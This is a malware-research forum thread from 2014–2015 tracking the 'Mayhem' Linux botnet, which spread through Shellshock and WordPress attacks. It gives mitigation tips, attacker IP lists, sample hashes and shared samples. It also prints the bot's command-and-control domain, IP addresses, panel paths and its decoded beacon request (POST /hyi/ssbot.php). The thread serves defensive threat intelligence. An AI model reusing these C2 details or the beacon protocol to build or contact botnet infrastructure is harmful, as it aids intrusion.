A forum for reverse engineering, OS internals and malware analysis 

Forum for analysis and discussion about malware.
 #24085  by unixfreaxjp
 Wed Oct 08, 2014 3:40 am
The "Mayhem Shellshock" warning advisory released: http://blog.malwaremustdie.org/2014/10/ ... ayhem.html
Many details for detection and mitigation information, please read even once.

Pointers:
1. Grep your httpd access log to spot whether your systems are targeted or not, see the grep howto in the post.
2. They use different spider ELF module which aiming for the shellshock vulnerability
3. Perl installer is used after being downloaded in /tmp, and malware installer will be deleted afterward after dropped and executed, so.. system's process, socket network and memory detection is the only way to recognize the infection, as well to the dropped crypted file sytem (the .xxxx file).
4. The malware will run using the web server privilege, if you use web server under root please change it now.
5. The ip addresses listed in the report were extracted & compiled from many VPS services in many countries (JP, AU, NZ, MY, KR) and we confirmed that the attack was received in US, Spain too, assuming word-wide attack in progress, clean up listed ip address or block them will be good to reduce the risk of infection.
6. Please help to inform more attacker source ip addresses, as well as more samples. Your every help is counts to reduce the risk caused by this threat.

Rgds/MalwareMustDie
 #24121  by unixfreaxjp
 Fri Oct 10, 2014 12:12 pm
Additional, case: Mayhem Shellshock
Current total recorded "known" attacker source IP is (unique) 51, from 22 countries, 49% are hosts in USA, including Google Cloud)
Code: Select all
192.169.59.190|emu.arvixe.com.|36351 | 192.169.48.0/20 | SOFTLAYER | US | ARVIXE.COM | ARVIXE LLC
192.3.138.103|host.colocrossing.com.|36352 | 192.3.136.0/21 | AS-COLOCROSSING | US | HUDSONVALLEYHOST.COM | HUDSON VALLEY HOST
205.186.134.213|thewineconsultant.com.|31815 | 205.186.128.0/19 | MEDIATEMPLE | US | MEDIATEMPLE.NET | MEDIA TEMPLE INC.
209.11.159.26|cpanel.webindia.com.|40913 | 209.11.128.0/19 | QTS-SJC-1 | US | SEALCONSULT.COM | IBIS INC.
216.121.52.101|101.52.121.216.reverse.gogrid.com.|26228 | 216.121.0.0/17 | SERVEPATH | US | GOGRID.COM | GOGRID LLC
54.213.225.160|ec2-54-213-225-160.us-west-2.compute.amazonaws.com.|16509 | 54.213.0.0/16 | AMAZON-02 | US | AMAZON.COM | AMAZON.COM INC.
67.214.182.202|202.smart-dns.net.|12260 | 67.214.176.0/20 | COLOSTORE | US | COLOSTORE.COM | COLOSTORE.COM
69.10.33.130||19318 | 69.10.32.0/20 | NJIIX-AS-1 | US | INTERSERVER.NET | INTERSERVER INC
69.20.200.203|webvms.kdsi.net.|32101 | 69.20.200.0/24 | ASN-KLYS | US | KELLYSUPPLY.COM | KELLY SUPPLY COMPANY
100.42.61.126|starfish.arvixe.com.|36351 | 100.42.61.0/24 | SOFTLAYER | US | ARVIXE.COM | ARVIXE LLC
108.168.131.219|s13.nzusatechgroup.com.|36351 | 108.168.128.0/19 | SOFTLAYER | US | SOFTLAYER.COM | SOFTLAYER TECHNOLOGIES INC.
162.144.46.158|server.forkliftmarket.com.au.|46606 | 162.144.0.0/16 | UNIFIEDLAYER-AS-1 | US | UNIFIEDLAYER.COM | UNIFIED LAYER
166.62.16.106|ip-166-62-16-106.ip.secureserver.net.|26496 | 166.62.16.0/22 | AS-26496-GO-DADDY-CO | US | GODADDY.COM | GODADDY.COM LLC
198.167.142.184|spanky.myserverplanet.com.|23033 | 198.167.142.0/24 | WOW | US | MYVIRPUS.COM | DNSSLAVE.COM
209.126.148.164||10439 | 209.126.128.0/17 | CARINET | US | PROENLACE.MX | CARI.NET
209.200.32.76|lazer.webair.com.|27257 | 209.200.32.0/19 | WEBAIR-INTERNET | US | WEBAIR.COM | WEBAIR INTERNET DEVELOPMENT COMPANY INC.
75.101.129.180|ec2-75-101-129-180.compute-1.amazonaws.com.|14618 | 75.101.128.0/17 | AMAZON-AES | US | AMAZON.COM | AMAZON.COM INC.
50.193.119.109|50-193-119-109-static.hfc.comcastbusiness.net.|7922 | 50.128.0.0/9 | COMCAST-7922 | US | COMCASTBUSINESS.NET | PLANET PARTS
177.87.80.17||262652 | 177.87.80.0/22 | R4C | BR | INTELIGNET.COM.BR | R4C SERVICOS DE INFORMATICA LTDA
187.16.21.42|forjastaurus.dominiotemporarioidc.com.|19089 | 187.16.21.0/24 | DH&C | BR | UOL.COM.BR | UNIVERSO ONLINE S.A.
91.221.99.35|h35-91.net.ix-host.ru.|50968 | 91.221.99.0/24 | HOSTMASTER | MD | IX-HOST.RU | HOSTMASTER LTD.
95.211.131.148|LLNH007.local.|16265 | 95.211.0.0/16 | FIBERRING | NL | LEASEWEB.COM | LEASEWEB B.V.
37.187.77.163|ns3366463.ip-37-187-77.eu.|16276 | 37.187.0.0/16 | OVH | FR | OVH.COM | OVH SAS
94.23.113.220||16276 | 94.23.0.0/16 | OVH | FR | OVH.COM | OVH SAS
194.27.156.249||8517 | 194.27.156.0/22 | ULAKNET | TR | - | CELAL BAYAR UNIVERSITESI
103.253.75.208||56309 | 103.253.72.0/22 | SIAMDATA | TH | - | TAN SPIRIT CO. LTD.
103.244.50.23||54113 | 103.244.50.0/24 | FASTLY | US | FASTLY.COM | FASTLY INC
116.193.76.20|sv20.quangtrungdc.name.vn.|24085 | 116.193.76.0/24 | QTSC-AS | VN | - | IP RANGE ALLOCATE FOR QTSC'S INTERNET DATA CENTER
184.107.246.98||32613 | 184.107.0.0/16 | IWEB-AS | CA | IWEB.COM | IWEB TECHNOLOGIES INC.
190.10.14.37|caam-190-10-14-a037.racsa.co.cr.|3790 | 190.10.14.0/24 | RADIOGRAFICA | CR | RACSA.CO.CR | SERVICIO CO-LOCATION RACSA
200.80.44.160|server.cubomagico.tv.|52270 | 200.80.44.0/24 | X | AR | IFXNW.COM.AR | NXNET
202.76.235.110||24218 | 202.76.224.0/20 | GTC-MY-PIP | MY | GLOBALTRANSIT.NET | GTC MY PIP NET
93.74.63.83|pedlarly-tack.volia.net.|25229 | 93.74.0.0/16 | VOLIA | UA | VOLIA.NET | KYIVSKI TELEKOMUNIKATSIYNI MEREZHI LLC
176.67.167.180||13213 | 176.67.160.0/20 | UK2NET | GB | UK2.NET | UK2 - LTD
82.165.36.8|s16296639.onlinehome-server.info.|8560 | 82.165.0.0/16 | ONEANDONE | DE | 1AND1.CO.UK | 1&1 INTERNET AG
82.200.168.83|82.200.168.83.adsl.online.kz.|9198 | 82.200.160.0/20 | KAZTELECOM | KZ | - | ENU
95.110.178.157|alodrink.eu.|31034 | 95.110.160.0/19 | ARUBA | IT | ARUBA.IT | ARUBA S.P.A.
103.7.84.13|web2.jabikha.net.|23950 | 103.7.84.0/24 | GENID-AS | ID | JABIKHA.NET | PT JARINGAN BISNIS KHATULISTIWA
89.206.41.50|host50-89-206-41.limes.com.pl.|29649 | 89.206.0.0/18 | LIMES | PL | LIMES.COM.PL | LIMES S.C.
85.232.60.34|futureis-3.titaninternet.co.uk.|20860 | 85.232.48.0/20 | IOMART | GB | TITANINTERNET.CO.UK | TITAN INTERNET LTD
91.130.113.149|d91-130-113-149.cust.tele2.at.|1257 | 91.128.0.0/14 | TELE2,S | EU | TELE2.AT | TELE2 TELECOMMUNICATION SERVICES GMBH
110.44.30.204|110-44-30-204.host.neural.net.au.|45844 | 110.44.28.0/22 | NEURALNETWORKS-AS | AU | NEURAL.NET.AU | NEURAL NETWORKS DATA SERVERS PTY. LTD.
83.168.199.4|static-83-168-199-4.cust.crystone.se.|35041 | 83.168.199.0/24 | NET-CRYSTONE | SE | CRYSTONE.SE | CRYSTONE AB
184.106.196.169|184-106-196-169.static.cloud-ips.com.|19994 | 184.106.0.0/16 | RACKSPACE | US | RACKSPACE.COM | RACKSPACE HOSTING
216.119.149.163|216.119.149.163.static.midphase.com.|32780 | 216.119.144.0/20 | HOSTINGSERVICES-INC | US | MIDPHASE.COM | HOSTING SERVICES INC.
184.106.196.169|184-106-196-169.static.cloud-ips.com.|19994 | 184.106.0.0/16 | RACKSPACE | US | RACKSPACE.COM | RACKSPACE HOSTING
67.23.9.241|67-23-9-241.static.cloud-ips.com.|33070 | 67.23.0.0/19 | RMH-14 | US | RACKSPACE.COM | RACKSPACE CLOUD SERVERS
216.228.104.39|lamp2.ncol.net.|11426 | 216.228.96.0/20 | SCRR-11426 | US | NCOL.NET | NCOL.NET INC.
82.222.172.99|host-82-222-172-99.reverse.superonline.net.|34984 | 82.222.172.0/24 | TELLCOM | TR | SUPERONLINE.NET | TELLCOM ILETISIM HIZMETLERI A.S.
184.107.144.146||32613 | 184.107.0.0/16 | IWEB-AS | CA | - | POLLOCK NEAL
23.251.144.200|200.144.251.23.bc.googleusercontent.com.|15169 | 23.251.128.0/19 | GOOGLE | US | GOOGLE.COM | GOOGLE INC.
Simple GeoIP map for the above list: http://malwaremustdie.org/stat/mayhem.html
I will try to do daily update the IP list here (not a promise) http://blog.malwaremustdie.org/2014/10/ ... ayhem.html
 #24319  by unixfreaxjp
 Wed Nov 12, 2014 8:11 am
K_Mikhail wrote:Suddenly still alive...
Same one found here too, it was source attack is Ukraine IP.
Installer at VT: https://www.virustotal.com/en/file/9b65 ... 415776068/
Callbacks goes to the .RU (Russia domain) < the name suggested relation for previous domains used.
Code: Select all
Domain: shaman-3ruki.ru
IP: 144.76.232.59 Port: 80
Request: POST /hyi/ssbot.php HTTP/1.0
Decoded syscalls:
DNS
Code: Select all
DNSRequest { connect(%d, {sa_family=AF_INET, sin_port=htons(53), sin_addr=inet_addr("8.8.8.8")}
send(%d,"\2506\1\0\0\1\0\0\0\0\0\0\fshaman-3ruki\2ru\0\0\1\0"..., %d, %t);
recvfrom(%d,"\2506\201\200\0\1\0\1\0\2\0\2\fshaman-3ruki\2ru\0\0\1\0"..., %d, FLAG, }
BackConnnect
CallBack { connect(%d, {sa_family=AF_INET, sin_port=htons(80), sin_addr=inet_addr("144.76.232.59")}, %d)
Code: Select all
write(%d, "POST /hyi/ssbot.php HTTP/1.0\r\nHo");
read(%d, "HTTP/1.1 200 OK\r\nDate: Wed, 12 N", $d);
read(%d, "", $RESPONSE);
close(6) }
CNC:
Code: Select all
CNCInitial {
POST /hyi/ssbot.php HTTP/1.0
Host: shaman-3ruki.ru
Pragma: 1337
Content-Length: 15

poll,0,,1343,1

HTTP/1.1 200 OK
Date: Wed, 12 Nov 2014 07:21:41 GMT
Server: Apache/2.2.22 (@RELEASE@)
X-Powered-By: PHP/5.3.3
Content-Length: 3
Connection: close
Content-Type: text/html; charset=UTF-8
0,}
Also POCing all of these:
Image
CNC is in YOUR-SERVER.DE/HETZNER network, ISP: Deutschland/Germany:
Code: Select all
144.76.232.59|static.59.232.76.144.clients.your-server.de.|24940 | 144.76.0.0/16 | HETZNER | DE | YOUR-SERVER.DE | COREM
CNC domain registration info:
Code: Select all
domain:        SHAMAN-3RUKI.RU
nserver:       ns1.r01.ru.
nserver:       ns2.r01.ru.
state:         REGISTERED, DELEGATED, VERIFIED
person:        Private Person
registrar:     R01-RU
admin-contact: https://partner.r01.ru/contact_admin.khtml
created:       2014.10.18
paid-till:     2015.10.18
free-date:     2015.11.18
source:        TCI
Last updated on 2014.11.12 11:21:30 MSK
Will add some more goodies, hold on.. #MalwareMustDie.
(sample was same as per post by @K_Mikhail)
 #24431  by K_Mikhail
 Tue Nov 25, 2014 5:03 pm
021af5de194024c0c76431ec6868534a250214e9

VT knows it from May 2014, but detection ratio is still poor.
Attachments
pw:infected
(10.69 KiB) Downloaded 59 times
 #24975  by K_Mikhail
 Sat Jan 17, 2015 3:34 pm
Possibly, fresh:
541bfccc1c1980e062c0a3df30a2cd6c
a138999e7a0b22f9ea59d199ebae3d11
Attachments
pw:infected
(13.73 KiB) Downloaded 57 times
 #25938  by sysopfb
 Wed May 27, 2015 7:31 pm
C2:
195.154.162.244/mayhem.php

panel is at /123.php
Attachments
pw: infected
(16.11 KiB) Downloaded 70 times
 #26116  by unixfreaxjp
 Thu Jun 18, 2015 1:13 pm
Mayhem attack from Ukraine.
Reported in VT, please read the comment, has VERY useful information: https://www.virustotal.com/en/file/6aa4 ... 434628014/ ..And here: https://twitter.com/MalwareMustDie/stat ... 7612307456

Attacker:
Code: Select all
  "ip": "46.118.119.63",
  "hostname": "SOL-FTTB.63.119.118.46.sovam.net.ua",
  "city": null,
  "country": "UA",
  "loc": "50.4500,30.5233",
  "org": "AS15895 Kyivstar PJSC"
CNC:
Code: Select all
  "ip": "176.119.3.244",
  "hostname": "No Hostname",
  "city": null,
  "country": "UA",
  "loc": "50.4500,30.5233",
  "org": "AS58271 FOP Gubina Lubov Petrivna"
Installer:
Image
CNC syscalls:
Image
Traffic:
Image
CNC Domain used & IP routes of CNC
Image
Initial detection antivirus for the installer (PHP): 7/47
Image
Initial detection IDS (ET sigs)
Image

Panel is up in the CNC ip. Samples, the encrypted drive and drops are attached & shared here.
Pls support us, and help take this down. #MalwareMustDie!
Attachments
7z / pwd:infected
(91.85 KiB) Downloaded 65 times
 #26122  by unixfreaxjp
 Fri Jun 19, 2015 7:23 am
The current attack pattern on the wordpress users to inject Mayhem is in progress. Noted that fake user-agents.
If you see these access coming from Ukraine please help to report right away:
Image

Image

And this is the access for malware installer execution, the Ukraine attacker is seemed abusing Russian network in SPB for the botnet panel.
Image
 #26306  by K_Mikhail
 Thu Jul 16, 2015 4:30 pm
5bbdecf6844ded06e88c4d9e89ae19d3 (bruteforce.so)
77f48245b2b1b99e4da685902c28aa64 (crawler.so)
Attachments
pw: infected
(5.57 KiB) Downloaded 63 times